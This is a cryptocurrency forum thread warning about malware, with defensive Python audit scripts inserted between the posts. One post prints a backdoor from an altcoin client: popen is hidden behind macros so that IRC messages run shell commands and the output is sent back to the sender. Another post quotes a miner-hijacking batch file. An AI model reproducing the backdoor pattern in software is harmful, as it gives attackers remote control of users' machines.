            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.
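
The backdoor quoted above survives a quick read because `popen` never appears by name at the call site: it is reached through the `CRead` alias. The following Python audit is an added example, not code from the original post or from the coin's repository; it resolves `#define` aliases and reports every call site that ends in a process-execution function. The `#define` lines in `SAMPLE` are reconstructed from the macro-resolved listing (the page does not show the header), and the sink list and function names are this example's own assumptions.

```python
"""Audit C/C++ source for process-execution calls hidden behind #define aliases."""
import re

# Calls that spawn a process or a shell. This list is this example's choice,
# not an exhaustive inventory.
EXEC_SINKS = frozenset({
    "popen", "_popen", "system", "execl", "execlp", "execle",
    "execv", "execvp", "execve", "WinExec", "ShellExecuteA", "CreateProcessA",
})

# One pass removes string/char literals and comments, so names inside them
# are never mistaken for code. Block comments keep their newlines so that
# reported line numbers still match the original file.
_NOISE = re.compile(
    r'"(?:\\.|[^"\\\n])*"|\'(?:\\.|[^\'\\\n])*\'|//[^\n]*|/\*.*?\*/', re.S)
_DEFINE = re.compile(r'^\s*#\s*define\s+([A-Za-z_]\w*)(\([^)]*\))?\s+(.*)$')
_IDENT = re.compile(r'[A-Za-z_]\w*')
_CALL = re.compile(r'([A-Za-z_]\w*)\s*\(')


def _blank(match):
    text = match.group(0)
    return '""' if text[0] in "\"'" else "\n" * text.count("\n")


def parse_defines(clean_source):
    """Map macro name -> replacement text (object-like and function-like).
    Macros continued over several lines with a backslash are not handled."""
    macros = {}
    for line in clean_source.splitlines():
        m = _DEFINE.match(line)
        if m:
            macros[m.group(1)] = m.group(3)
    return macros


def resolve_chain(name, macros, seen=frozenset()):
    """Follow macro replacements from `name`; return the alias chain ending in
    an exec sink, or None. `seen` stops self-referential macros from looping."""
    if name in EXEC_SINKS:
        return [name]
    if name not in macros or name in seen:
        return None
    for ident in _IDENT.findall(macros[name]):
        chain = resolve_chain(ident, macros, seen | {name})
        if chain:
            return [name] + chain
    return None


def audit(source):
    """Return [(line_number, 'Alias -> ... -> sink'), ...] for every call site."""
    clean = _NOISE.sub(_blank, source)
    macros = parse_defines(clean)
    findings = []
    for lineno, line in enumerate(clean.splitlines(), 1):
        if line.lstrip().startswith("#"):
            continue  # the definition itself is not a call site
        for m in _CALL.finditer(line):
            chain = resolve_chain(m.group(1), macros)
            if chain:
                findings.append((lineno, " -> ".join(chain)))
    return findings


# Constructed input: a reduction of the quoted snippet plus reconstructed
# #define lines (assumed; the page only shows the macro-resolved result).
SAMPLE = r'''// irc.cpp (constructed reduction)
#define CBuff "PRIVMSG"
#define CLine FILE
#define CRead popen
#define CFree pclose

if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        CFree(buf);
    }
}
'''

if __name__ == "__main__":
    for lineno, chain in audit(SAMPLE):
        print(f"line {lineno}: process execution via {chain}")
```

A hit in IRC or other network-handling code is the signal to read that function line by line; the script only narrows where to look and does not replace a full preprocessor.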
Sasuke.Sasuke
Jr. Member
*
Offline Offline

Activity: 39


View Profile
December 08, 2016, 05:36:23 AM
 #88

Useful thread.. I always use sandboxie and shadow defender before installing or running any new program nowadays... And medium-level hackers fear virustotal because they send the file for further analysis (as what i've heard) and their FUD malware loses its FUD ability. So my suggestion will be... Use sandboxie or any similar software and still use software like shadow defender for any kind of new programs... And before doing anything just scan it in virustotal if you can.

Note: just don't trust any new person or software just like that.

In between the user(shsfhs) above me just quoted the original thread and no reply (seems like a new botter in town).
ioanbtc
Sr. Member
****
Offline Offline

Activity: 271


View Profile WWW
December 27, 2016, 09:34:23 PM
 #89

If i use antymalwarebytes i can be protected?

forces1234
Member
**
Offline Offline

Activity: 116


View Profile
December 29, 2016, 10:50:30 PM
 #90

is there any good anti virus to handle it??
indiemax
Hero Member
*****
Offline Offline

Activity: 720


View Profile
January 19, 2017, 06:18:42 PM
 #91

Beware of links sent to your PM box, even ones that look like a link to a thread on the forum.
JanpriX
Hero Member
*****
Online Online

Activity: 672


Buy The Fucking Dip


View Profile
February 11, 2017, 11:44:10 PM
 #92

is there any good anti virus to handle it??

I would like to ask this same question here. Can anyone cite a software/site that can provide better anti-malware program for our PC? I know that being cautious in clicking/visiting links will avert you from malware but it wouldn't hurt if we can install a program that has good reputation in stopping malwares getting inside our machines.

caribou2357
Newbie
*
Offline Offline

Activity: 10


View Profile
February 15, 2017, 06:35:08 PM
 #93

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!
groggin
Legendary
*
Offline Offline

Activity: 1442



View Profile
February 15, 2017, 07:16:09 PM
 #94

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

 there is no comprehensive overall protection, think, rather in layers. a vpn, a good antivirus, spybot s&d, hosts file (hostsman), sandboxie, a virtual machine should all be in place.

  avoid win 10
  if u use 7, 8, or 8.1, remove or do not install the microsoft spyware
   even better, use mac or linux

there is freeware available to do all this  Cheesy

MWesterweele
Hero Member
*****
Offline Offline

Activity: 672



View Profile
February 22, 2017, 06:32:40 AM
 #95

In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.


thanks for informing us, however we must know how to avoid this. we all give importance to bitcoin, therefore we must take care of it. there are some kind of people that want to earn bitcoin without giving some effort on it, they just want to take it from others easily. secure your browsers, don't click anything that is not important, looks may be deceiving brothers.


redblue!!
Newbie
*
Offline Offline

Activity: 7


View Profile
February 24, 2017, 06:29:58 AM
 #96

Thank you .. I think it is very good information for me as a beginner. I will always support you.
superresistant
Legendary
*
Offline Offline

Activity: 1680



View Profile
February 25, 2017, 06:55:19 PM
 #97

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.

Here's my bag so you don't ask : Bitcoin, tenX, iexec, byteball and pepecash
rebel69
Member
**
Offline Offline

Activity: 67


View Profile
February 27, 2017, 07:16:25 AM
 #98

THANK YOU FOR THE INFORMATION MY FRIEND  Grin

passwordnow
Hero Member
*****
Offline Offline

Activity: 616



View Profile
February 27, 2017, 01:47:25 PM
 #99

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would be fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.



vapourminer
Legendary
*
Offline Offline

Activity: 1423

what is this "brake pedal" you speak of?


View Profile
February 27, 2017, 02:00:41 PM
 #100

formatting/reinstalling an OS on a computer over and over does not reduce its lifespan. its one of the surest way of getting rid of suspected virus/malware.

if you were thinking of writes to SSDs, formatting/reinstalling will hardly reduce its effective lifespan, most will be long obsolete before they wear out.

whenever i set a new rig (mining or otherwise) up i image the OS as soon as its patched up and all essential programs are installed. that way all i need to do to go to a new, clean baseline OS is a one shot restore that takes minutes.
Cherylstar86
Sr. Member
****
Offline Offline

Activity: 336



View Profile
March 04, 2017, 11:14:43 AM
 #101

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offer no protection for this but it's very easy to protect yourself :

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that formatting regularly your computer isn't a good habit at all. You are just making the life span of your personal computer to become lesser but if you are going to do that with garbage computer that would be fine and there's no need to worry about it. And for those people out there that can't help their fingers but to click suspicious links, always don't believe people who are posting some links.

Oh I see more optional solutions to help a lot of problems raised on this thread but, you're right it's not really good to format your pc immediately just to give up solving the malware infection while OS is still running. For you to make the lifespan of your computer you must download the most reliable pc security that would take all the worries you have, and I can recommend eset nod32 antivirus latest version now available if you search on their site online; even trial version works totally fine.

ownageplocks
Member
**
Offline Offline

Activity: 97


View Profile
March 10, 2017, 12:42:46 AM
 #102

Does this include the malware I've seen that changes any bitcoin address you copy to your clipboard to an unsavory character's bitcoin address? When you unknowingly paste their address and press send, you lose your precious coin forever. Just remember to always check the sending address twice!

RavenOffice
Newbie
*
Offline Offline

Activity: 8


View Profile
March 15, 2017, 03:06:53 PM
 #103

Thanks for sharing! I've added some of these malicious sites to CoinJabber.com a place for users to rate and review cryptocurrency sites...Basically yelp for Crypto

https://www.coinjabber.com/
Mumbeeptind1963
Hero Member
*****
Offline Offline

Activity: 546



View Profile WWW
March 29, 2017, 04:54:18 PM
 #104

correct me if im wrong but malware it's generically for executables in windows no? i mean the wallets are but its not kaspersky enough?
if not why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coins ones) like doge ltc btc and a few more.

We need to be vigilant in all our actions. We should look to the link above the browser every time we are opening it. Hackers may hack our account by making us fool. Sometimes they are creating websites that are like be the same like the legit ones, just look to the link very carefully to avoid problems.

karmamiu
Sr. Member
****
Offline Offline

Activity: 266



View Profile
April 02, 2017, 07:40:35 AM
 #105

I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.

shewasfourteen
Sr. Member
****
Offline Offline

Activity: 308



View Profile
April 02, 2017, 12:25:47 PM
 #106

I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.

Bitcoin users are definitely targets for hackers, especially for script kiddies, hobby hackers, and semi professional hackers.


sergio
Sr. Member
****
Offline Offline

Activity: 306


View Profile WWW
April 06, 2017, 09:31:22 AM
 #107

I recommend  using Linux for any PC running a  full node, Linux is much more secure than windows.

The safe way of doing this is to create a special account for the node, and make sure that wallet.dat can only be read by the owner, not others, not the group, only the owner of the account.

Then create a separate account for your regular usage, that way in the event that you do get a virus, the virus would run under the ownership of the account that got the virus, and not under the ownership of the account that runs the full node, this way your bitcoins, litecoins, dash, etc they will be safe.

For extra security Trezor and Ledger Nano S are the best.

Both are great hardware wallets, and both have features that are missing on the other wallet, trezor has support for a password manager, and ledger has support for litecoins.

I recommend to have both, for traveling by plane the Ledger has the advantage that looks like a usb stick.
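
A check for the account separation described above, as an added Python example that is not part of the original post: it verifies that `wallet.dat` and its data directory belong to the node account and grant nothing to group or other. Checking the directory as well goes one step beyond the post, and the paths, placeholder wallet contents and function names are constructed for the example (POSIX only).

```python
"""Audit and tighten permissions on a node's wallet.dat (POSIX systems)."""
import os
import stat
import tempfile


def _check(path, label, node_uid):
    """Report ownership and mode problems for one filesystem object."""
    st = os.lstat(path)
    if stat.S_ISLNK(st.st_mode):
        return [f"{label} is a symlink; audit the target instead"]
    problems = []
    if st.st_uid != node_uid:
        problems.append(f"{label} is owned by uid {st.st_uid}, expected {node_uid}")
    mode = stat.S_IMODE(st.st_mode)
    if mode & 0o077:  # any group or other permission bit
        problems.append(f"{label} mode {oct(mode)} grants group/other access")
    return problems


def audit_wallet(wallet_path, node_uid):
    """Check the wallet file and the directory that contains it.
    A wallet with mode 0600 inside a directory other accounts can write to
    can still be renamed or replaced, so both are checked."""
    wallet_path = os.path.abspath(wallet_path)
    return (_check(wallet_path, "wallet.dat", node_uid)
            + _check(os.path.dirname(wallet_path), "data directory", node_uid))


def harden(wallet_path):
    """Owner-only access: 0600 on the wallet, 0700 on its directory."""
    wallet_path = os.path.abspath(wallet_path)
    os.chmod(wallet_path, 0o600)
    os.chmod(os.path.dirname(wallet_path), 0o700)


def demo(node_uid=None):
    """Build a throwaway data directory with a constructed wallet.dat,
    audit it with common default modes, harden it, and audit again."""
    node_uid = os.getuid() if node_uid is None else node_uid
    with tempfile.TemporaryDirectory() as datadir:
        wallet = os.path.join(datadir, "wallet.dat")
        with open(wallet, "wb") as fh:
            fh.write(b"constructed placeholder, not a real wallet")
        os.chmod(wallet, 0o644)   # world-readable, a common default
        os.chmod(datadir, 0o755)  # other accounts can list and enter it
        before = audit_wallet(wallet, node_uid)
        harden(wallet)
        after = audit_wallet(wallet, node_uid)
    return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", *before, sep="\n  ")
    print("after: ", after or "no problems found")
```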
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
April 14, 2017, 12:09:46 AM
 #108

I didn't even think that malware could possibly enter and do some harm here, Thanks OP this thread helps me more aware of malware. One time also I got victimized by malware and i didn't know where it came from, Sadly but more expenses to cure it.

Bitcoin users are definitely targets for hackers, especially for script kiddies, hobby hackers, and semi professional hackers.

You know it.. and so did "Satoshi".. Shocked

He/ they are cryptoFIAT banking on it. (pun intended) Cheesy

phila
Newbie
*
Activity: 28
April 14, 2017, 01:20:27 PM
 #109

My ethmining is being hijacked.

Ok so this morning after waking up one of my rigs was mining on nicehash, but I was mining on miningpoolhub and didn't specify a failover.  In my logs I discovered reboot.bat file was uploaded through ethman.exe and ran remotely.

I reckon that's why Claymore said in his readme:
"Warning: use negative option value or disable remote management entirely if you think that you can be attacked via this port!"

I had it on a positive number in order to manage, but how did a hacker get access over the internet to manage my miner? I consider myself paranoid careful and usually take all precautions. Is this a mistake on my side or is it just that easy to access someone's EthDcrMiner64 remotely? Does this mean files might be compromised or is it more like someone has my external IP, will a VPN make a difference? Any advice is appreciated.

I replaced my Claymore folder with a new one and made most files inside read-only, but how do I know I am not still compromised, how much access does this hacker have now and what should I do to ensure further safety?  As you can see inside the reboot.bat file the hacker's bitcoin address: "1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M" is busy stealing quite a nice sum of equihash at the moment.

02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded
02:00:08:454   6f2c   srv bs: 0
02:00:08:454   6f2c   sent: 40
02:00:09:231   17d8   GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
xxxxxxxxx
xxxxxxxxx
02:00:09:887   397c   ETH: 04/14/17-02:00:09 - New job from europe.ethash-hub.miningpoolhub.com:17020
02:00:09:887   397c   target: 0x0000000112e0be82 (diff: 4000MH), epoch #117
02:00:09:888   397c   ETH - Total Speed: 53.104 Mh/s, Total Shares: 19, Rejected: 0, Time: 00:22
02:00:09:888   397c   ETH: GPU0 26.859 Mh/s, GPU1 26.244 Mh/s
02:00:09:889   397c    DCR - Total Speed: 1593.105 Mh/s, Total Shares: 123, Rejected: 1
02:00:09:889   397c    DCR: GPU0 805.781 Mh/s, GPU1 787.324 Mh/s
02:00:10:231   406c   recv: 73
02:00:10:232   406c   srv pck: 73
02:00:10:232   406c   Remote management: file reboot.bat was uploaded
02:00:10:232   406c   srv bs: 0
02:00:10:233   406c   sent: 682
02:00:10:604   7608   recv: 51
xxxxxxxxxx
02:00:13:363   689c   Remote management required restart
02:00:13:364   689c   Rebooting
02:00:13:377   4630   srv bs: 0
02:00:13:377   4630   sent: 210

==================reboot.bat========================
"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe" -epool stratum+tcp://daggerhashimoto.hk.nicehash.com:3353 -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -esm 3 -allpools 1 -estale 0 -dpool stratum+tcp://decred.eu.nicehash.com:3354 -dwal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x
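
Added example, not part of the post above and not Claymore's own code: a Python scan of a miner log in the format shown in the post for remote-management file transfers followed by a restart, plus a check of a batch file's `-epool`/`-ewal`/`-dpool`/`-dwal` values against the operator's own settings. The sample lines are copied from the post; `EXPECTED_WALLET`, `ALLOWED_POOL_SUFFIX` and the function names are constructed for this example.

```python
import re
import shlex
from urllib.parse import urlsplit

# Layout of the log lines in the post: HH:MM:SS:mmm, thread id, message.
LOG_LINE = re.compile(r"^(\d\d):(\d\d):(\d\d):(\d{3})\s+([0-9a-f]+)\s+(.*)$")
FILE_EVENT = re.compile(r"^Remote management: file (\S+) was (uploaded|downloaded)$")
RESTART_TEXT = "Remote management required restart"
WATCHED = {"-ewal": "wallet", "-dwal": "wallet", "-epool": "pool", "-dpool": "pool"}

# Lines copied from the log in the post (including one redaction line).
SAMPLE_LOG = """\
02:00:08:453   6f2c   Remote management: file reboot.bat was downloaded
02:00:09:231   17d8   GPU0 t=79C fan=32%, GPU1 t=79C fan=31%
xxxxxxxxx
02:00:10:232   406c   Remote management: file reboot.bat was uploaded
02:00:10:233   406c   sent: 682
02:00:13:363   689c   Remote management required restart
02:00:13:364   689c   Rebooting
"""

# reboot.bat from the post, joined onto one line.
SAMPLE_BAT = (
    r'"C:\guiminer-scrypt_win32_binaries_v0.04\cgminer\Claymore-4.1\EthDcrMiner64.exe"'
    " -epool stratum+tcp://daggerhashimoto.hk.nicehash.com:3353"
    " -ewal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -epsw x -esm 3 -allpools 1 -estale 0"
    " -dpool stratum+tcp://decred.eu.nicehash.com:3354"
    " -dwal 1D8J2tkRbt5R7TNZKdBYdq8qx2aJDFqU1M -dpsw x"
)

# The operator's own settings: constructed placeholders, not values from the post.
EXPECTED_WALLET = "operator.rig1"
ALLOWED_POOL_SUFFIX = ".miningpoolhub.com"


def remote_management_events(log_text):
    """Return (ms_since_midnight, kind, filename) for each remote-management line."""
    events = []
    for raw in log_text.splitlines():
        m = LOG_LINE.match(raw.strip())
        if not m:
            continue  # wrapped or redacted lines are skipped
        h, mi, s, ms = (int(x) for x in m.group(1, 2, 3, 4))
        stamp = ((h * 60 + mi) * 60 + s) * 1000 + ms
        message = m.group(6).strip()
        f = FILE_EVENT.match(message)
        if f:
            events.append((stamp, f.group(2), f.group(1)))
        elif message == RESTART_TEXT:
            events.append((stamp, "restart", None))
    return events


def uploads_followed_by_restart(events, window_ms=10_000):
    """Pair each uploaded file with a restart that follows within window_ms.

    The log carries no date, so a pair that straddles midnight is not matched.
    """
    hits = []
    for i, (t_up, kind, name) in enumerate(events):
        if kind != "uploaded":
            continue
        for t_rs, kind2, _ in events[i + 1:]:
            if kind2 == "restart" and 0 <= t_rs - t_up <= window_ms:
                hits.append((name, t_rs - t_up))
                break
    return hits


def audit_miner_command(command_line, expected_wallet, allowed_pool_suffix):
    """List (flag, value) pairs whose wallet or pool is not the operator's own."""
    tokens = shlex.split(command_line, posix=False)  # keep Windows backslashes
    findings = []
    for flag, value in zip(tokens, tokens[1:]):
        kind = WATCHED.get(flag)
        if kind == "wallet" and value != expected_wallet:
            findings.append((flag, value))
        elif kind == "pool":
            host = urlsplit(value).hostname or ""
            if not host.endswith(allowed_pool_suffix):
                findings.append((flag, host or value))
    return findings


if __name__ == "__main__":
    evts = remote_management_events(SAMPLE_LOG)
    print(uploads_followed_by_restart(evts))
    print(audit_miner_command(SAMPLE_BAT, EXPECTED_WALLET, ALLOWED_POOL_SUFFIX))
```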
8xbt.com
Sr. Member
****
Activity: 263
发XBT - Chinese Bitcoiner
April 17, 2017, 12:25:40 AM
 #110

Does the malware affect desktop/laptop computers only? Does it affect iPhone/iOS users?

ownageplocks
Member
**
Activity: 97
April 18, 2017, 03:15:49 PM
 #111

This forum is being targeted heavily by malware developers because it's a quick target for people who have money in crypto. It's difficult to detect as you said because of crypters. It's not uncommon for them to spoof file extensions too. What looks like a .jpg could just be a hidden executable. Stay safe out there.
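
Added example, not part of the post above: a Python check that compares a file's name with the first bytes of its content, flagging an image-looking name that hides an executable. The function names, finding labels and sample byte strings are constructed for this example; the extension list is illustrative, not exhaustive.

```python
import ntpath

# Extensions that Windows runs directly (illustrative subset).
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".bat", ".cmd", ".pif", ".msi"}
# Leading bytes of native executables.
EXECUTABLE_MAGIC = {b"MZ": "Windows PE", b"\x7fELF": "ELF"}
# Leading bytes a genuine image of each type must start with.
IMAGE_MAGIC = {
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}


def extension_findings(filename, head):
    """Compare a file name with the first bytes of its content.

    Returns a list of finding labels; an empty list means name and content agree
    as far as these checks go (it does not mean the file is safe).
    """
    name = ntpath.basename(filename).lower()   # handles both / and \ separators
    stem, ext = ntpath.splitext(name)
    inner_ext = ntpath.splitext(stem)[1]
    findings = []

    # "photo.jpg.exe": shown as "photo.jpg" when known extensions are hidden.
    if ext in EXECUTABLE_EXTS and inner_ext in IMAGE_MAGIC:
        findings.append("double-extension")

    # Executable content behind a non-executable name. "MZ" is only two bytes,
    # so treat a hit on a text file as a reason to look closer, not as proof.
    if ext not in EXECUTABLE_EXTS:
        for magic, kind in EXECUTABLE_MAGIC.items():
            if head.startswith(magic):
                findings.append("executable-content:" + kind)

    # Image extension whose content lacks that format's signature.
    if ext in IMAGE_MAGIC and not head.startswith(IMAGE_MAGIC[ext]):
        findings.append("signature-mismatch:" + ext)
    return findings


def check_file(path):
    """Read the first bytes of `path` and run the name/content comparison."""
    with open(path, "rb") as fh:
        head = fh.read(16)
    return extension_findings(path, head)


if __name__ == "__main__":
    # Constructed samples: a PE header stub and a PNG signature.
    print(extension_findings("holiday.jpg", b"MZ\x90\x00\x03"))
    print(extension_findings(r"C:\Users\me\Downloads\Wallet.JPG.exe", b"MZ\x90\x00"))
    print(extension_findings("photo.png", b"\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR"))
```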

freebtc4e
Sr. Member
****
Activity: 420
just passionate
April 28, 2017, 03:41:55 PM
 #112

I'm adding this to the list of possible scams:

Of which there are 2 lines
Which I have underlined



Are you new to trading cryptocurrencies? Do you want to learn how to earn your slice in crypto riches?
Read our guides written by the Crypto Traders Room community, for FREE! And get your foot wet..

Guide on trading cryptocurrencies in general:

https://docs.google.com/document/d/1YgB5Jf1jbm8OzT9372ZqCkBnTQui6gkx0SICKq61Pv0/edit#

Guide on trading on margin (with leverage) on Poloniex exchange:

https://docs.google.com/document/d/1ex37eOVMCWJRHXLN6KLQcrMPsUbQw15jAFrLeO1aSUk/edit?usp=sharing

Join our chat room by following this link:
https://discord.gg/9h4kjAE

- be sure to check out Discord app on iOS or android
- preferred to use discord desktop application for PC use rather than browser




mafia15
Member
**
Activity: 60
May 04, 2017, 03:46:06 PM
 #113

this one is a scam .. gonna add this

----- maffiemase ------
zigoter
Newbie
*
Activity: 28
May 11, 2017, 01:02:27 AM
 #114

Never Use a Hacked Wallet

Changing passwords is not a solution, because of the possibility that all the private keys in your hacked wallet are already known to the hacker, and a private key cannot be replaced.

Leave the wallet that has been hacked. Use a new wallet.
sarfield
Full Member
***
Activity: 210
May 13, 2017, 04:20:37 AM
 #115

Could anyone answer this question for me? I do have Comodo's sandbox running on my computer. Would that be enough to protect me against the kinds of exploits that the op is referring to in this post, especially with respect to malicious file downloads? Thanks!

Anti-virus offers no protection for this, but it's very easy to protect yourself:

Do not download anything from this forum.
Do not mine shitcoins on your main computer. Do not install shitcoins on your main computer.

Use a garbage computer with no personal information and not connected to your network for this shit and format it regularly.


I just want to make it clear that regularly formatting your computer isn't a good habit at all. You are just making the life span of your personal computer shorter, but if you are going to do that with a garbage computer that would be fine and there's no need to worry about it. And for those people out there that can't help their fingers but click suspicious links, never believe people who are posting some links.
Oh, I see more optional solutions to help with a lot of the problems raised on this thread, but you're right, it's not really good to format your PC immediately just to give up solving the malware infection while the OS is still running. For you to make the lifespan of your computer you must download the most reliable PC security that would take all the worries you have, and I can recommend the latest version of ESET NOD32 antivirus, now available if you search on their site online; even the trial version works totally fine.
I want to ask, what are the characteristics of a secure application to install? Because I often install the applications I need from the internet...

sarfield
Full Member
***
Activity: 210
May 13, 2017, 08:15:26 AM
 #116

I didn't even think that malware could possibly enter and do some harm here. Thanks OP, this thread helps me be more aware of malware. One time I also got victimized by malware and I didn't know where it came from; sadly, more expenses to cure it.

Basically, the user's caution is necessary to keep computer software safe.

joeyjojoshb
Jr. Member
*
Activity: 42
May 25, 2017, 12:45:22 AM
 #117

There is an easy way to avoid this. Don't install every crypto coin that comes out and try their software if you don't fully understand their code or it's not fully evaluated. Also don't run it on machines or networks where you have finances. Try to VMware/VirtualBox it before you add it to your massive list of altcoins you invest in.
thecryptoconsultant
Full Member
***
Activity: 124
Check thecryptoconsultant.com for Newbie training
May 25, 2017, 12:05:31 PM
 #118

Hi Security aware people who commented in here

Do you know if all the TOP20 blockchains have been tested just like the bitcoin code has been, or is there a risk that we discover that a network like maidsafecoin or Waves is a scam?

Thanks for commenting your thoughts.

Victor

niisarearning
Sr. Member
****
Activity: 252
★ BitClave ICO. Join NOW ★
June 06, 2017, 10:25:23 AM
 #119

I am also getting some personal messages from newbies asking for Skype and Gmail IDs for better earning, and more spam posts nowadays; even some links I checked are completely not secured.

8xbt.com
Sr. Member
****
Activity: 263
发XBT - Chinese Bitcoiner
June 06, 2017, 10:53:57 AM
 #120

I am also getting some personal messages from newbies asking for Skype and Gmail IDs for better earning, and more spam posts nowadays; even some links I checked are completely not secured.

Just avoiding clicking on any suspicious URLs or links/downloads should be enough.

2econd
Full Member
***
Activity: 196
June 09, 2017, 01:51:22 PM
 #121

Thanks for sharing, wouldn't want to be that guy losing it all.

yusuf98
Full Member
***
Activity: 154
June 09, 2017, 03:31:35 PM
 #122

Could you please post the coin's name and maybe others that you may have found ?
Yes it is very helpful for the advancement of investing new coin

AmarO
Member
**
Activity: 84
June 11, 2017, 01:01:46 AM
 #123

Thanks a lot, great educational and eye opening post.
Edunitt
Newbie
*
Activity: 29
June 11, 2017, 01:13:39 AM
 #124

Not all heroes wear capes.

Thank you very much.

wantjokull
Sr. Member
****
Activity: 350
June 14, 2017, 01:27:38 AM
 #125

That's dangerous. Aren't there any precautions by forum devs for such cyber attacks? It is easy for anyone to open ANN threads or any topic, and that's freedom, completely agreed. But what if shit is opened up by attackers every day and we get victims every day? This is not healthy for the forum, really.

MOBSSTER
Member
**
Activity: 88
June 14, 2017, 07:19:58 PM
 #126

So using Linux or Ubuntu Helps?
vapourminer
Legendary
*
Activity: 1423
what is this "brake pedal" you speak of?
June 14, 2017, 11:06:43 PM
 #127

So using Linux or Ubuntu Helps?

it helps as most malware targets windows. with windows best practice is up to date patches, good firewall good antivirus and good internet hygiene.

*nix/apple is not 100 % immune though.

MWesterweele
Hero Member
*****
Activity: 672
June 16, 2017, 05:37:17 PM
 #128

So using Linux or Ubuntu Helps?
